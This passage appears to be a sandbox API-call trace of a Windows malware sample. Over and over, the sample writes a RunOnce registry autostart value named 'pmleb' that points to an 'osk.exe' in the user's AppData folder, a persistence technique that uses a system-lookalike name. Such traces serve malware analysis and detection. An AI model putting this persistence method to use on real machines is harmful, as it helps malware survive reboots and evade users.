hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.991] RegCloseKey (hKey=0x280) returned 0x0 [0097.991] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.991] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.991] SetTimer (hWnd=0x20280, nIDEvent=0x22c7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c7 [0097.991] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.005] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.005] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.005] KillTimer (hWnd=0x20280, uIDEvent=0x22c7) returned 1 [0098.005] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.006] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.006] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.006] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.006] RegCloseKey (hKey=0x280) returned 0x0 [0098.006] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.006] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.006] SetTimer (hWnd=0x20280, nIDEvent=0x22c8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c8 [0098.006] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.020] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.020] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.020] KillTimer (hWnd=0x20280, uIDEvent=0x22c8) returned 1 [0098.021] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.021] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.021] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.021] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.021] RegCloseKey (hKey=0x280) returned 0x0 [0098.022] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.022] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.022] SetTimer (hWnd=0x20280, nIDEvent=0x22c9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c9 [0098.022] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.036] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.036] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.036] KillTimer (hWnd=0x20280, uIDEvent=0x22c9) returned 1 [0098.036] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.037] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.037] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.037] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.038] RegCloseKey (hKey=0x280) returned 0x0 [0098.038] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.038] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.038] SetTimer (hWnd=0x20280, nIDEvent=0x22ca, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ca [0098.038] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.051] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.051] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.052] KillTimer (hWnd=0x20280, uIDEvent=0x22ca) returned 1 [0098.052] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.052] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.052] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.052] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.053] RegCloseKey (hKey=0x280) returned 0x0 [0098.053] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.053] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.053] SetTimer (hWnd=0x20280, nIDEvent=0x22cb, uElapse=0xa, lpTimerFunc=0x0) returned 0x22cb [0098.053] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.074] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.074] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.074] KillTimer (hWnd=0x20280, 
uIDEvent=0x22cb) returned 1 [0098.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.075] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.075] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.075] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.075] RegCloseKey (hKey=0x280) returned 0x0 [0098.076] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.076] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.076] SetTimer (hWnd=0x20280, nIDEvent=0x22cc, uElapse=0xa, lpTimerFunc=0x0) returned 0x22cc [0098.076] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.083] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.083] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.083] KillTimer (hWnd=0x20280, uIDEvent=0x22cc) returned 1 [0098.083] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.083] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.083] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.084] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.084] RegCloseKey (hKey=0x280) returned 0x0 [0098.084] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.084] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.084] SetTimer (hWnd=0x20280, nIDEvent=0x22cd, uElapse=0xa, lpTimerFunc=0x0) returned 0x22cd [0098.084] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.098] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.098] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.098] KillTimer (hWnd=0x20280, uIDEvent=0x22cd) returned 1 [0098.099] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.099] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.099] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.099] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.099] RegCloseKey (hKey=0x280) returned 0x0 [0098.100] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.100] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.100] SetTimer (hWnd=0x20280, nIDEvent=0x22ce, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ce [0098.100] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.114] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.114] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.114] KillTimer (hWnd=0x20280, uIDEvent=0x22ce) returned 1 [0098.114] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0098.115] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.115] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.115] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.115] RegCloseKey (hKey=0x280) returned 0x0 [0098.116] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.116] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.116] SetTimer (hWnd=0x20280, nIDEvent=0x22cf, uElapse=0xa, lpTimerFunc=0x0) returned 0x22cf [0098.116] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.130] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.130] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.130] KillTimer (hWnd=0x20280, uIDEvent=0x22cf) returned 1 [0098.130] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.131] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.131] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.131] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.131] RegCloseKey (hKey=0x280) returned 0x0 
[0098.131] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.131] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.132] SetTimer (hWnd=0x20280, nIDEvent=0x22d0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d0 [0098.132] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.145] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.145] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.145] KillTimer (hWnd=0x20280, uIDEvent=0x22d0) returned 1 [0098.146] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.146] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.146] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.146] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.147] RegCloseKey (hKey=0x280) returned 0x0 [0098.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.147] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.147] SetTimer (hWnd=0x20280, nIDEvent=0x22d1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d1 [0098.147] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.161] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.161] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.161] KillTimer (hWnd=0x20280, uIDEvent=0x22d1) returned 1 [0098.161] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.162] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.162] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.162] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.162] RegCloseKey (hKey=0x280) returned 0x0 [0098.162] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.162] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.163] SetTimer (hWnd=0x20280, nIDEvent=0x22d2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d2 [0098.163] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.176] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.176] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.176] KillTimer (hWnd=0x20280, uIDEvent=0x22d2) returned 1 [0098.177] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.177] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.177] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.177] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.177] RegCloseKey (hKey=0x280) returned 0x0 [0098.178] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.178] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.178] SetTimer (hWnd=0x20280, nIDEvent=0x22d3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d3 [0098.178] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.192] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.192] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.192] KillTimer (hWnd=0x20280, uIDEvent=0x22d3) returned 1 [0098.193] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.193] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.193] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.193] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.194] RegCloseKey (hKey=0x280) returned 0x0 [0098.194] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.194] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.194] SetTimer (hWnd=0x20280, nIDEvent=0x22d4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d4 [0098.194] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.207] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.207] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.208] KillTimer (hWnd=0x20280, uIDEvent=0x22d4) returned 1 [0098.208] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.208] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.208] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.209] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.209] RegCloseKey (hKey=0x280) returned 0x0 [0098.209] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.209] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.209] SetTimer (hWnd=0x20280, nIDEvent=0x22d5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d5 [0098.209] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.223] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.223] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.224] KillTimer (hWnd=0x20280, uIDEvent=0x22d5) returned 1 [0098.224] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.224] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.224] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.225] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.225] RegCloseKey (hKey=0x280) returned 0x0 [0098.225] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.225] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0098.225] SetTimer (hWnd=0x20280, nIDEvent=0x22d6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d6 [0098.225] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.286] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.286] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.286] KillTimer (hWnd=0x20280, uIDEvent=0x22d6) returned 1 [0098.286] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.287] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.287] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.287] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.287] RegCloseKey (hKey=0x280) returned 0x0 [0098.288] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.288] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.288] SetTimer (hWnd=0x20280, nIDEvent=0x22d7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d7 [0098.288] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.301] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.301] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.301] KillTimer (hWnd=0x20280, uIDEvent=0x22d7) returned 1 [0098.302] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.302] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.302] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.302] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.303] RegCloseKey (hKey=0x280) returned 0x0 [0098.303] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.303] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.303] SetTimer (hWnd=0x20280, nIDEvent=0x22d8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d8 [0098.303] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.317] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.317] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.317] KillTimer (hWnd=0x20280, uIDEvent=0x22d8) returned 1 [0098.317] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.318] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.318] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.318] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.318] RegCloseKey (hKey=0x280) returned 0x0 [0098.318] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.318] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.318] SetTimer (hWnd=0x20280, nIDEvent=0x22d9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d9 
